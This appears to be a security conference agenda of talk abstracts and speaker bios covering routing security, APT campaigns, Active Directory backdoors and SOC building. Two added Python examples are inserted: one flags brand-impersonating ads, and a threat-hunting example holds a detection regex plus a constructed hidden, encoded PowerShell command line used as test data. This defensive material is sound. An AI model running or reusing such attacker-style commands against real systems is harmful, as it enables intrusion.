Increasingly, enterprise digital assets are located outside the organization perimeter. Therefore, routing security becomes a critical requirement of securing the supply chain. To increase awareness and participation among enterprises, a second, elevated tier of MANRS (https://www.manrs.org) participation is being developed that requires connectivity providers to comply with more stringent provisions and auditing – MANRS+. It creates a stronger business case for routing security for providers while engaging their customers by raising awareness, generating demand, and providing necessary tools for security assurance. It is a compact set of routing security controls and audit requirements that can be embedded in common infosec frameworks and referenced in procurement practices. This talk will discuss strengthening security for enterprises and their connectivity providers.
June 24, 2025 11:30-12:05
- JP TLP:AMBER
Securing a Global Conglomerate: Mitsui & Co.'s Journey from Chaos to Control
Takahiro Okuhara (MITSUI & CO., LTD., JP)
Takahiro works as the operational leader of MBK-CSIRT at Mitsui & Co., Ltd. His responsibilities cover a wide range of tasks, including planning the cybersecurity strategy for the entire Mitsui & Co. group, a global conglomerate, designing measures in line with the strategy, project management for implementing these measures, managing cybersecurity operations, and leading incident response. In his previous job, he worked at a security vendor, where he was mainly involved in security assessments, penetration testing, and other technical consulting services related to PCI DSS for clients in the credit card industry.
Mitsui & Co., Ltd, a leading "Sogo Shosha" (a Japanese conglomerate engaged in trading and business investment), manages a global network of approximately 500 consolidated group companies. This extensive reach means protecting a wide range of businesses. MBK-CSIRT (MBK stands for Mitsui & Co.) operates with a dual mandate, functioning as both the internal CSIRT for Mitsui & Co. and the group CSIRT for its affiliates. This involves daily coordination of incidents across the group, ensuring a unified response to cybersecurity threats. In this session, I will present several distinctive incident cases within the Mitsui & Co. group, highlighting challenges, response strategies, and outcomes. Additionally, I will introduce lessons learned and security enhancements, including the expansion of MBK-CSIRT, establishment of group cybersecurity standards, and formation of a global cyber insurance policy. The session will conclude with reflections on the journey from chaos to control, emphasizing a proactive and coordinated approach to cybersecurity.
June 23, 2025 14:45-15:20
- CH, TLP:CLEAR
Social Engineering in the Age of AI: Rethinking Security Training
Cornelia Puhze (SWITCH-CERT, CH)
Cornelia is a security awareness & communications expert at Switch-CERT, advocating for a human-centred approach to security. She supports various communities to become better security advocates and thereby empower people to improve their digital literacy and be safe online. Cornelia is educated to postgraduate level in corporate and political communications and has a background in teaching. Cornelia co-chairs the FIRST SIG Human Factors in Security.
In the age of AI, social engineering (SE) attacks have become more sophisticated than ever. AI-generated deepfakes and flawlessly crafted phishing emails make it impossible to rely on familiar cues like voice, images, or writing styles. Yet traditional security awareness training still focuses on teaching users to spot specific signs -- an approach that assumes rational, System 2 thinking. The reality? SE attacks succeed by exploiting emotional, reactive System 1 thinking, making existing training methods increasingly ineffective. This talk introduces a different type of approach. Instead of relying on rule-based detection, we focus on meta-level awareness: teaching users the adversarial mindset so they understand how they're being targeted and manipulated. Drawing on Cialdini's principles of influence and incorporating mindfulness techniques, this approach equips users to pause, recognize emotional triggers, and respond rationally. Attendees will leave with actionable insights to build a resilient, human-centred defence against SE attacks.
June 24, 2025 14:15-14:50
- LT, BW
Southern African Development Community's CII handbook - What Others Can Re-Use?
Vilius Benetis (NRD Cyber Security, LT), Shukya Kiroga (CRASA - The Communication Regulators' Association of Southern Africa, BW)
Dr. Vilius Benetis is a member of NRD CIRT (at NRD Cyber Security), where he leads a team of experts to consult, establish, and modernise CSIRT/SOCs for governments, organisations, and sectors in Africa, Asia, Europe, and Latin America.
He is an active contributor to the development of CSIRT/SOC-related methodologies for ENISA, FIRST.org, GFCE and ITU. He is a co-author of the presented handbook.
Shukya Kiroga is Head of Electronic Communications at CRASA - The Communication Regulators' Association of Southern Africa, part of the Southern African Development Community (SADC). He led the development of the CIIP regional handbook.
The Southern African Development Community (SADC) is a regional African intergovernmental organization that includes 16 countries, all of which are striving to establish well-functioning cybersecurity. Previously, SADC set a target to establish national CSIRTs in all member countries; it is now following up with a proper Critical Information Infrastructure (CII) protection setup on top. To this end, a new SADC CII Handbook has been developed to assist all countries in making it work. The presentation will explain the value of having such a regional handbook, its use cases, and its dependencies on CSIRT and SOC ecosystems. In addition, the presenters will motivate other countries in Africa and beyond that are building CSIRTs and CIIP frameworks to partner and use such a handbook as a common practice.
June 27, 2025 09:45-10:20
- US, TLP:CLEAR
The Convergence of Threat Behaviors Across Intrusions
Joe Slowik (The MITRE Corporation, US)
Joe Slowik has over 15 years of experience across multiple information security domains. Joe currently leads the CTI and ICS functions within the MITRE ATT&CK framework, along with researching threats to critical infrastructure. Joe has previously worked in CTI, detection engineering, and threat hunting roles at Dragos, Huntress, DomainTools, and Los Alamos National Laboratory.
Information security, and especially threat intelligence, often elevates adversaries into unique, "sophisticated" entities practicing particular, specific tradecraft. However, the truth of the matter is that threat actor operations have undergone a great convergence in behaviors in the past several years. This great convergence results in commodity eCrime actors looking almost indistinguishable from state-sponsored entities in many phases of network intrusions. As a result, threat actors look less "unique" and begin to blend together into a nearly indistinguishable mess of tradecraft and tool reuse. In this discussion, we will explore how this convergence has come to pass, then review its implications. From a threat intelligence perspective, delineating between threat actors has become increasingly difficult as behaviors overlap, but from a defender perspective countering these entities has become somewhat simplified, or at least focused, given adversary overlap. However, such overlap does not take place in a vacuum. In particular, threat actors have naturally evolved toward methodologies that inherently blend in with normal actions - from LOLBins to RMM abuse - creating significant problems for detection and response. We will conclude the discussion with an overview of how adversaries have converged on abuse of "benign" mechanisms and what this means for the future of both offense and defense in network security.
June 26, 2025 15:00-15:35
- IT, TLP:AMBER
The Dark Side of Digital Ads: How to Protect Your Brand using Meta AD Library
Giuseppe Morici (Intesa Sanpaolo S.p.A., IT), Grazia Leonetti (Intesa Sanpaolo S.p.A., IT)
A seasoned professional Manager with 14 years of experience in cybersecurity, this expert brings deep knowledge in Blue Team operations, Offensive Security, and Cyber Threat Intelligence.
A criminologist & intelligence analyst particularly interested in all kinds of threats, working in cyber security since 2016 with a focus on security architecture, awareness and cyber security culture and, from 2020, in cyber threat intelligence.
Our project focuses on Cyber Threat Intelligence to tackle the misuse of social media platforms like Facebook and Instagram for fraudulent activities, particularly brand abuse through malicious ads, which until now has often been overlooked as a real threat, as we will clearly demonstrate. We present a scalable and cost-effective solution to detect and combat brand abuse using the Meta Ad Library, a public domain resource. By leveraging this library, we created an automated system for real-time detection and response. This approach, adaptable to any SOAR platform, custom scripts, or manual processes, demonstrates that even organizations with limited resources can implement robust cybersecurity measures. The key benefit for the community lies in the ability to replicate this solution across industries. Organizations of all sizes can use the tools and methods shared in this project to enhance their own cybersecurity and contribute to a safer digital ecosystem. By adopting these strategies, the community can work together to reduce the impact of cyber threats and build a more resilient online environment for all. This presentation highlights how open-access tools, scalable solutions, and a collaborative approach can empower the community to tackle cybercrime effectively and efficiently.
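The abstract describes polling the Meta Ad Library and flagging ads that abuse a brand. The following is an added illustration of that triage step, not the presenters' tooling: it builds the search query an automated collector would poll and then scores a page of results against a brand allowlist (official page IDs and landing domains), folding digit/symbol look-alikes such as "Examp1e" back to letters before matching. The endpoint version and parameter names are assumptions to be checked against the current Graph API reference; the brand profile and the ad records are constructed for the example, with field names taken from the ads_archive response.

```python
"""Brand-abuse triage over Meta Ad Library search results.

Added example, not the presenters' code. Record fields follow the Ad Library
API's ads_archive response; all records and the brand profile are constructed.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlencode, urlparse

# Assumed endpoint and parameter names; verify against the current Graph API
# reference before use. No request is made in this example.
AD_LIBRARY_ENDPOINT = "https://graph.facebook.com/v19.0/ads_archive"
FIELDS = "id,page_id,page_name,ad_creative_bodies,ad_creative_link_captions,ad_snapshot_url"

# Hypothetical brand profile: what the legitimate advertiser looks like.
BRAND = {
    "keywords": ("example bank", "examplebank"),
    "official_page_ids": {"1001"},
    "official_domains": {"examplebank.example", "www.examplebank.example"},
}

# Fold common digit/symbol look-alikes back to letters before keyword matching.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})


def build_search_url(brand_term: str, countries: List[str], access_token: str) -> str:
    """Query a collector would poll on a schedule (ad_reached_countries is a JSON-style list)."""
    params = {
        "search_terms": brand_term,
        "ad_reached_countries": "[" + ",".join(f'"{c}"' for c in countries) + "]",
        "ad_type": "ALL",
        "ad_active_status": "ACTIVE",
        "fields": FIELDS,
        "access_token": access_token,
    }
    return f"{AD_LIBRARY_ENDPOINT}?{urlencode(params)}"


def normalise(text: str) -> str:
    return re.sub(r"\s+", " ", text.lower().translate(CONFUSABLES)).strip()


def mentions_brand(text: str) -> bool:
    folded = normalise(text)
    return any(keyword in folded for keyword in BRAND["keywords"])


def link_host(caption: str) -> str:
    """Link captions arrive as bare hostnames or full URLs; return the lower-case host."""
    cap = caption.strip().lower()
    if "://" not in cap:
        cap = "http://" + cap
    return urlparse(cap).hostname or ""


def triage_ad(ad: Dict) -> Optional[Dict]:
    """Return a finding for an ad that talks about the brand from outside the allowlist."""
    bodies = ad.get("ad_creative_bodies") or []  # field may be null for image-only ads
    if not any(mentions_brand(body) for body in bodies):
        return None
    reasons = []
    if str(ad.get("page_id")) not in BRAND["official_page_ids"]:
        reasons.append("advertiser page not in brand allowlist")
    for caption in ad.get("ad_creative_link_captions") or []:
        host = link_host(caption)
        if host and host not in BRAND["official_domains"]:
            reasons.append(f"landing host {host} not in brand allowlist")
    if not reasons:
        return None
    return {"ad_id": ad["id"], "page_name": ad.get("page_name"),
            "snapshot": ad.get("ad_snapshot_url"), "reasons": reasons}


def triage(ads: List[Dict]) -> List[Dict]:
    return [finding for finding in map(triage_ad, ads) if finding]


# Constructed sample page of results: one official ad, one impersonation,
# one unrelated ad, one official ad pointing at a partner domain, one with no text.
SAMPLE_ADS = [
    {"id": "a1", "page_id": "1001", "page_name": "Example Bank",
     "ad_creative_bodies": ["Example Bank: open an account in minutes"],
     "ad_creative_link_captions": ["examplebank.example"],
     "ad_snapshot_url": "https://www.facebook.com/ads/archive/render_ad/?id=a1"},
    {"id": "a2", "page_id": "5599", "page_name": "Examp1e Bank Support",
     "ad_creative_bodies": ["Your Examp1e Bank account is suspended. Verify now."],
     "ad_creative_link_captions": ["examplebank-verify.example"],
     "ad_snapshot_url": "https://www.facebook.com/ads/archive/render_ad/?id=a2"},
    {"id": "a3", "page_id": "777", "page_name": "Pizza Corner",
     "ad_creative_bodies": ["Best pizza in town"],
     "ad_creative_link_captions": ["pizzacorner.example"]},
    {"id": "a4", "page_id": "1001", "page_name": "Example Bank",
     "ad_creative_bodies": ["Example Bank mortgage offer"],
     "ad_creative_link_captions": ["https://promo.partner.example/mortgage"]},
    {"id": "a5", "page_id": "42", "page_name": "No Text",
     "ad_creative_bodies": None, "ad_creative_link_captions": None},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_ADS):
        print(finding["ad_id"], finding["page_name"], "->", "; ".join(finding["reasons"]))
```

The fourth record shows the tuning an operator faces: an official page sending traffic to a partner or tracking domain is flagged on the landing host alone, so the domain allowlist has to include every legitimate destination, or those single-reason hits are routed to a lower-priority queue rather than to takedown.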
June 25, 2025 14:00-14:35
- CH, TLP:CLEAR
The Evolving Cybersecurity Governance Landscape: Non-State Actors, the UN Framework and Critical Infrastructure
Serge Droz (FIRST / Swiss FDFA, CH)
Serge Droz is a senior IT security expert and seasoned incident responder. Today he works as a senior advisor at the Swiss Federal Department of Foreign Affairs, where he looks at the interface between cybersecurity, international law, peace and cyber-diplomacy. He studied physics at ETH Zurich and the University of Alberta, Canada, and holds a PhD in theoretical astrophysics. For more than 20 years he has worked in different security roles in private industry and academia in Switzerland and Canada, including at a national CERT in Switzerland and at Proton.
Serge is a member of the board of directors of FIRST (Forum for Incident Response and Security Teams), the premier organisation of recognised global leaders in incident response. In this role he actively participates in discussions relating to cyber security at various policy bodies, in particular related to norm building.
Serge is an active speaker and a regular trainer for CSIRT (Computer Security Incident Response Team) courses around the world.
Over the past two decades, states have grappled with regulatory challenges in cyberspace. Currently, most states have committed to the United Nations Framework on Responsible State Behavior in Cyberspace, which primarily comprises soft law norms, confidence-building measures (CBMs), and capacity-building initiatives. Despite widespread adoption, ongoing debates persist regarding the framework's interpretation and practical implications for non-state actors. The Geneva Dialogue, an innovative initiative launched by the Swiss government, addresses this critical gap. This inclusive platform is open to all non-state actors and systematically explores the UN framework's broader consequences. Through the ongoing development of the Geneva Manual, the dialogue meticulously documents the roles and responsibilities of diverse stakeholders, including cybersecurity teams, researchers, and open-source developers. In its last edition the Dialogue focused on critical infrastructure. This presentation will provide an overview of the UN cybersecurity framework, followed by an in-depth, scenario-based discussion of its implications for non-state actors. Notably, the Geneva Manual is conceptualized not as a definitive guide, but as a dynamic, evolving document. Shaped by real-world cases and the collaborative insights of volunteers and practitioners, it represents a novel approach to understanding cybersecurity governance in an increasingly complex digital landscape.
June 27, 2025 09:00-09:35
- FR, TLP:CLEAR
The Funny Story of Active Directory Backdooring
Sylvain Cortes (Hackuity, FR)
Sylvain Cortes is an international expert in identity and access management (IAM) and cybersecurity. During his career, he has mainly worked with large organizations to carry out identity or directory governance projects, including authentication processes, inter-OS privilege management, cloud identity management and Active Directory cybersecurity. He has developed deep expertise in Active Directory security and backdooring concepts. Sylvain is the president of CADIM, a French non-profit organization that organizes an annual event in Paris dedicated to identity management and cyber security: www.identitydays.com. Sylvain is a speaker at various events such as Black Hat, Cloud Expo, IdentityDays, FS-ISAC, aOS, IT Nordics, Les Assises de la Sécurité, FIC, etc. For 18 years, Sylvain has been recognized by Microsoft as a Microsoft MVP on Active Directory & Security.
What is the hardest question to answer after an Active Directory attack? It's very simple: "Do I have a backdoor in my directory after this attack?" In this session, we will present the state of the art regarding backdoors in AD, with concrete examples of simple and advanced techniques working from AD 2003 to AD 2025 and ensuring attackers' group persistence. We will cover AD backdoors in general, then go into detail about backdooring techniques targeting SIDhistory, Managed by, gPLink, GPOs, ACEs, and more. Finally, we'll look at the combination of multiple techniques used to hide leads and make persistent attackers virtually undetectable.
June 26, 2025 09:00-09:35
- DK, TLP:AMBER
The Negotiation Paradox
Jan Kaastrup (CSIS Security Group, DK), Michael Sjøberg (Delta Crisis Management, DK)
Jan was an Advisory Board Member of Europol's European Cybercrime Centre (EC3) from 2013 to 2018 and has been an advisor on numerous major international security incidents, such as WannaCry and Petya. With over 25 years' experience in IT security (including network architecture, forensics, incident response, malware research, penetration testing and financial fraud), Jan frequently appears on Danish TV as a cybersecurity subject-matter expert. Jan regularly presents at regional and international cyber security conferences, in addition to hosting the annual Copenhagen Cybercrime Conference.
Michael Sjøberg leads the hostage negotiation and crisis management consultancy Human Advisor Group. Michael has worked professionally with crisis management and negotiations since 2001. He is an army captain (ret.) and holds a Master's Degree in International Relations, with complex risk management, crisis negotiations and the strategic handling of high-profile political hostage takings as his specialty. He is a hostage negotiator trained by New Scotland Yard. Michael is frequently used in Scandinavian media as a subject matter expert on kidnap situations and hostage negotiations, and advises a number of clients in the financial and energy sectors.
There are many opinions when it comes to communicating and even negotiating with Threat Actors (TA). Often, the victim is strongly recommended NOT to engage with the TA. This talk will give you a unique insight into examples from real-life cases where TA communication assisted the technical investigation and vice-versa. The talk will include technical and strategic elements within Incident Response, and you will understand why TA communication is not the same as paying a ransom. In fact, sometimes, TA communication is the only way to understand the entire risk set associated with the incident.
June 24, 2025 15:00-15:35
- US, TLP:CLEAR
The Ontology for SOC Creation Assistance and Replication (OSCAR): A Community-Derived Tool for Developing SOC Capabilities
Justin Novak (Software Engineering Institute, US), Chris Rodman (Software Engineering Institute, US)
Dr. Justin Novak is a Senior Security Operations Researcher at the CERT Division of the Software Engineering Institute, leading a team as part of the Security Operations Division supporting the US Department of State, Department of Defense, and United States Treasury. In this role, his main focus is on capacity building for incident responders, both at the individual and organizational level. At the SEI, he is also involved in research on the development and operation of CSIRTs, Sector CSIRTs, and Security Operations Centers, focusing on incident response and incident management. Prior to the SEI, Justin worked in a variety of government roles, including with the federal government at the Department of Defense, and in state government. Justin holds a bachelor's degree in Physics from the University of Pittsburgh, a master's degree in Security Studies from the University of Pittsburgh, and a PhD in Science and Technology Policy from George Mason University with a focus on the impacts of the development of innovative open-source software. Justin also serves as an adjunct professor at George Mason University's College of Engineering and Computing.
Christopher began his professional career following the completion of his Bachelor of Science degree in Information Science and Technology from Penn State University. Shortly after, he joined the corporate IT department of a prominent Pittsburgh-based manufacturing company, where he worked in roles covering database and infrastructure administration, application performance and consulting, crisis management, incident response, data loss prevention, and vulnerability management. With a focus on security, Christopher obtained his Master of Science degree in Information Security and Assurance from Robert Morris University in 2016, and in 2018 he joined the CERT Division of the Software Engineering Institute (SEI) of Carnegie Mellon University to build high-fidelity exercise and training simulations for various agencies within the United States government. The following year he became a Senior Cybersecurity Operations Researcher within CERT, assisting security operations center teams and international CSIRTs with capacity and capability building. Christopher has previously served as an adjunct professor at the University of Pittsburgh's School of Computing and Information and Carnegie Mellon University's Heinz College, and currently teaches Host-Based Digital Forensics at the CMU Information Networking Institute.
More organizations are choosing to deploy a Security Operations Center (SOC) model to improve enterprise security and to monitor data and information assets. However, developing a SOC can be a difficult, time-consuming, and expensive task. This also applies to organizations which may stop short of deploying a full stand-alone SOC, but which may nevertheless choose to deploy some capabilities normally associated with a SOC. To help organizations develop SOCs and SOC capabilities, we developed the Ontology for SOC Creation Assistance and Replication (OSCAR), a freely available resource meant to guide an organization through the development process, providing important baselines and a useful knowledge base along the way. OSCAR was developed using community input, including interviews with FIRST member teams and input from other public and private sector SOC experts. Using this input, we synthesized a purpose-built dataset containing real-world insights into the SOC knowledge domain. For OSCAR, we used this dataset to develop a knowledge hierarchy that focuses on the traditionally emphasized people, process, and technology knowledge classes, while also addressing planning and functional considerations. OSCAR fills a gap in existing cyber ontologies by describing the development of SOCs and SOC capabilities, which is not a well-defined knowledge domain within existing cybersecurity ontologies, such as the Unified Cyber Ontology. Additionally, because the domain-specific knowledge used to create OSCAR is derived directly from working experts in the field, the ontology itself is a unique dataset not replicated elsewhere.
June 24, 2025 09:00-09:35
- US, TLP:CLEAR
The Party Isn't Over: Uncovering Konfety's Novel "Evil Twin" Technique
Lindsay Kaye (HUMAN Security, US), Gavin Reid (HUMAN Security, US)
Lindsay Kaye is the Vice President of Threat Intelligence at HUMAN Security. Her technical specialty spans the fields of malware analysis and reverse engineering, with a keen interest in dissecting custom cryptographic systems. Prior to her work at HUMAN, Lindsay served as Senior Director of Advanced Reversing, Malware, Operations and Reconnaissance as part of the Insikt Group at Recorded Future. She has proposed, won funding for and led research projects, particularly during her time at The MITRE Corporation. Outside of work, Lindsay writes articles on complex cybersecurity issues including data and trends analysis, technical pieces on reverse engineering and TTPs, and discussions on the business of the cybercriminal underground. Lindsay is an internationally-recognized cybersecurity speaker and author. She holds a BS in Engineering with a Concentration in Computing from Olin College of Engineering and an MBA from Babson College.
Gavin Reid serves as the CISO for HUMAN Security, a cybersecurity company that specializes in safeguarding enterprises from digital attacks while preserving digital experiences for users. In addition, he leads the Satori Threat Intelligence and Research Team as VP of Threat Intelligence. Gavin began his cybersecurity career in information security at NASA's Johnson Space Center. He later went on to create Cisco's Security Incident Response Team (CSIRT), Cisco's Threat Research and Communications (TRAC), and Fidelity's Cyber Information Group (CIG). Before joining HUMAN, Gavin served as the CSO for Recorded Future, where he was responsible for ensuring the protection, integrity, confidentiality, and availability of all customer-facing services, internal operational systems, and related information assets. For more than 20 years, Gavin has managed every aspect of security for large enterprises.
Evil twins can be the topic of science fiction, tales of mystery and... advertising fraud? We uncovered a sophisticated ad fraud campaign that we dubbed Konfety, involving over 250 Android apps, in which each benign app distributed via the Play Store had an "evil twin" adware app counterpart and its corresponding infrastructure. We will explain how Konfety was able to effectively create its own malicious ecosystem, from their ad SDK to their malicious infrastructure that could be started and scaled to support the evil twins at the press of a button to reselling ad inventory to make money, and provide a technical overview of how they did it. While Konfety is an ad fraud campaign, at its core, the distribution of the malicious twin applications was done via drive-by malvertising, broadening the scope and impact of the campaign past the mobile ecosystem. During this talk, we will also explain how we conducted this investigation, and others like it, including how we discovered the novel "evil twin" technique, and provide insight into our investigative framework. We will also provide guidance for how to incorporate threat intelligence and threat hunting investigation techniques into your own organization, even without having a threat intelligence team.
June 27, 2025 11:15-11:50
- US, TLP:CLEAR
Threat Hunting with Python & Pandas
Anthony Talamantes (Johns Hopkins University Applied Physics Laboratory, US), Matt Dulle (Johns Hopkins University Applied Physics Laboratory, US)
Anthony has over 24 years of experience in cybersecurity, with the last 17 years focused on nation-state and sophisticated adversaries. Anthony developed the Cyber Hunt program at the Johns Hopkins Applied Physics Laboratory and currently manages the Cyber Hunt, Applied Cyber Research, and Architecture & Engineering teams.
Matt has over 13 years of experience in cybersecurity and is the Lead Reverse Engineer in the Applied Cyber Research team at Johns Hopkins Applied Physics Lab. Matt performs malware analysis and uses behavioral indicators to proactively hunt for malicious activity in the enterprise.
This presentation will discuss some of the limitations of traditional SIEMs and how cybersecurity is evolving away from them. We then describe threat hunting and detection engineering with a more iterative and scalable methodology than is typically used with traditional SIEMs. We will examine the use of Python, Pandas, and other libraries in Jupyter notebooks to gain additional visibility into, and analysis of, adversarial activities. We will demonstrate how this approach can work in cyber operations and give examples of the entire process, including code examples. We will wrap up by discussing how this is achievable by analysts without Python and data science backgrounds.
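The abstract promises code for the notebook-driven hunting loop; the speakers' examples are not on this page, so the block below is an added illustration written for this agenda, not theirs. It loads a constructed set of process-creation events (the fields Sysmon Event ID 1 or an EDR would give you) into a Pandas DataFrame and runs two hunts that are awkward in a SIEM query language but natural in Pandas: stacking parent/child pairs by the number of hosts they appear on so that the rare pairs float to the top, and a regex sweep for encoded PowerShell. The events, hostnames and the placeholder base64 payload are all constructed.

```python
"""Two Pandas hunts over constructed process-creation events.

Added example for the talk abstract above, not the speakers' notebook code.
All events below are constructed; the "encoded" payload is placeholder base64.
"""
import pandas as pd

# -e / -enc / -EncodedCommand followed by a base64 blob. The \s+ after the switch
# keeps "-ExecutionPolicy" from matching as "-e".
ENCODED_PS = r"(?i)(?:^|\s)-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"


def _baseline_events():
    """Normal desktop activity on eight workstations: the background a hunt stacks against."""
    rows = []
    for i in range(1, 9):
        host = f"ws{i:02d}"
        t0 = pd.Timestamp("2025-06-26T08:00:00") + pd.Timedelta(minutes=i)
        for parent, image, cmdline in (
            ("explorer.exe", "chrome.exe", "chrome.exe"),
            ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
            ("explorer.exe", "outlook.exe", "outlook.exe"),
        ):
            rows.append({"time": t0, "host": host, "user": f"user{i}",
                         "parent": parent, "image": image, "cmdline": cmdline})
    return rows


EVENTS = _baseline_events() + [
    # Two admins launching PowerShell from the desktop: benign, but seen on only two hosts.
    {"time": pd.Timestamp("2025-06-26T09:10:00"), "host": "ws05", "user": "admin1",
     "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass .\\inventory.ps1"},
    {"time": pd.Timestamp("2025-06-26T09:12:00"), "host": "ws07", "user": "admin2",
     "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe"},
    # Word spawning hidden, encoded PowerShell on a single host (constructed payload).
    {"time": pd.Timestamp("2025-06-26T09:31:00"), "host": "ws03", "user": "user3",
     "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
]


def load_events(records):
    """Normalise what the notebook works on: typed timestamps, lower-cased image names."""
    df = pd.DataFrame(records)
    df["time"] = pd.to_datetime(df["time"])
    for col in ("parent", "image"):
        df[col] = df[col].str.lower()
    return df.sort_values("time").reset_index(drop=True)


def stack_parent_child(df):
    """Frequency analysis: on how many distinct hosts does each parent->child pair occur?"""
    stack = df.groupby(["parent", "image"])["host"].nunique().rename("hosts").reset_index()
    return stack.sort_values(["hosts", "parent", "image"]).reset_index(drop=True)


def rare_pairs(df, max_hosts=1):
    """Pairs seen on max_hosts or fewer machines; widen max_hosts as the fleet grows."""
    stack = stack_parent_child(df)
    return stack[stack["hosts"] <= max_hosts]


def events_for(df, pairs):
    """Pull the raw events behind stacked pairs so an analyst can pivot on them."""
    return df.merge(pairs[["parent", "image"]], on=["parent", "image"], how="inner")


def encoded_powershell(df):
    """Vectorised regex over the command line: encoded PowerShell regardless of parent."""
    mask = df["image"].eq("powershell.exe") & df["cmdline"].str.contains(ENCODED_PS, regex=True)
    return df[mask]


if __name__ == "__main__":
    events = load_events(EVENTS)
    print(stack_parent_child(events))
    print(events_for(events, rare_pairs(events))[["time", "host", "parent", "cmdline"]])
    print(encoded_powershell(events)[["host", "cmdline"]])
```

The stacking output is the iteration point the abstract refers to: with `max_hosts=1` only the Word-to-PowerShell pair surfaces; raising it to 2 also returns the two administrators, which is exactly the kind of result an analyst reviews, adds to an exclusion frame, and re-runs, all inside the same notebook rather than by editing a SIEM rule.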
June 26, 2025 13:30-14:05
- IN, TLP:CLEAR
Uncovering the Whispers of an APT Targeting Specific Industries in South Asia
Sathwik Ram Prakki (Quick Heal, IN), Subhajeet Singha (Quick Heal, IN)
Sathwik Ram Prakki works as Senior Security Researcher at Seqrite Labs, Quick Heal. His areas of research are threat intelligence, APT hunting, delving into dark web and malware analysis. With a background in offensive security and knowledge of OS internals, he is keen on enhancing detections and infrastructure for threat hunting and CTI. Starting his cybersecurity career at C-DAC, under the Ministry of Electronics & IT in India, Sathwik has shared insights on APTs, ransomware and malware ecosystems at conferences such as AVAR, Botconf, c0c0n, and Virus Bulletin.
Subhajeet is working as a Security Researcher in Security Labs at Quick Heal. His areas of focus are threat intelligence, research along with reverse engineering to improve detection capabilities and to aid in further research.
A new campaign targeting various industries, such as the defense sector in Pakistan and, predominantly, researchers from Hong Kong, has been uncovered. Tracked as Operation Cobalt Whisper, the entire campaign heavily leverages the post-exploitation tool Cobalt Strike, which is deployed using obfuscated VBScript. A total of 20 infection chains have been identified along with additional individual samples; 18 of them targeted Hong Kong and two targeted Pakistan, and over 30 decoy files have been identified. In this talk, we will explore the technical details of one of the campaigns we encountered during our initial analysis and examine the various stages of the infection chain, starting with a deep dive into the decoy documents. We will then investigate the common Tactics, Techniques, and Procedures (TTPs), such as the use of malicious VBScript and LNK payloads, employed by this threat actor across most campaigns. These methods facilitate the in-memory execution of the Cobalt Strike implant, which is delivered alongside these lures in an archive file. Finally, we will explore hunting for its infrastructure, which leads us to multiple host headers of Cobalt Strike beaconing from a Chinese ASN, and a correlation with Bitter APT.
June 23, 2025 14:00-14:35
- AU, TLP:GREEN
Understand and Detect - Stealthy Techniques Used to Conceal Artifacts on Modern Linux Systems
Robert Byrne (Ericsson, AU)
Robert Byrne is a principal security specialist hosted in a global competence center for security within the Ericsson CTO office. Bringing over 18 years of experience in telecommunication engineering and information security, Robert holds cross-functional roles, spending his time performing vulnerability assessments and incident response activities that touch Ericsson's product and services portfolio. Robert holds a double degree in Engineering and Computer Science and is Offensive Security OSCP and (ISC)2 CISSP certified.
This presentation will discuss lesser known, anti-forensic techniques used to hide processes and files on modern Linux platforms. We will be exploring examples taken from both real-world cases and novel security research.
June 26, 2025 10:45-11:20
- NZ, TLP:CLEAR
Unmasking Cyber Security: Rethinking Small to Medium Business Security Awareness
Sophie Horgan (NCSC, NZ)
The talk will be presented by Sophie Horgan, Senior Communication and Engagement Advisor at the NCSC. Sophie joined CERT NZ (now NCSC) over four years ago and prior to that worked with the organisation on media relations and incident response. Throughout that time, she has gained a great deal of knowledge through working with stakeholders such as the media, SMEs and the general public, who look at cyber security through a different lens than those working in the field. This helped Sophie understand how to bring our knowledge and insight to SMEs in a way that is digestible and fit for purpose.
Small to medium enterprises (SMEs) are an important part of the worldwide economy. Good cyber security practices are an integral part of keeping SMEs secure and running their business smoothly. However, significant numbers of SMEs are not meeting best-practice cyber security standards. In New Zealand, less than half of SMEs would describe their organisation as prepared for a cyber attack. In Australia, 43% of cyber crime targets small business. Research tells us that while SMEs are aware and concerned, competing priorities and a lack of knowledge or time stop action. How do we make cyber security simpler, more accessible and easier for SMEs to act on? How do we get them to make it a priority? We know from international engagement that this is a problem faced by agencies worldwide working to support SMEs. The National Cyber Security Centre (NCSC) has developed and produced a video series designed to engage with businesses at their level, alongside simple resources they can use to continue their cyber security journey.
June 26, 2025 14:15-14:50
- CA, TLP:CLEAR
Unmasking MSC Files: A Deep Dive into APT Weaponization, Grim Resource Injection, and AppDomain Manager Hijacking
Hossein Jazi (Fortinet, CA), Douglas Santos (Fortinet, CA)
Hossein Jazi is a senior threat intelligence specialist at Fortinet, where he contributes as an active researcher with interests in APT tracking, malware analysis, cyber threat intelligence, and machine learning. His current efforts are centred on identifying and monitoring APT activities, along with publishing insightful blogs on their operations. In addition to these projects, Jazi is focused on developing proactive techniques to monitor cyber threat actors' actions and collaborating with various partners to enhance cyber threat research capabilities. He holds a Master's degree in computer science and has over 14 years of experience specializing in cybersecurity and APT analysis.
With more than two decades of experience in the cybersecurity field, I possess a unique blend of sales soft skills and deep technical acumen, making me a well-rounded individual who is at ease working in both technical and non-technical environments. My keen understanding of the cyber threat landscape allows me to communicate potential threats and vulnerabilities, as well as complex security issues and possible countermeasures, to any audience with ease.
Currently, my focus is on developing innovative ways to advance the state of the art in cyber threat intelligence, while managing a team of researchers and engineers. Our goal is to identify new attack vectors and develop proactive intelligence to protect against them. To help me achieve this mission, I am driving our partnership with MITRE CTID and participating in projects that are augmenting the state of the art when it comes to threat intelligence standards, tools, and response. We are also deploying these tools and standards across Fortinet's products and systems.
My vast experience, technical expertise, and communication skills have enabled me to excel in the cybersecurity industry, and I look forward to continuing to drive innovation and progress in this field.
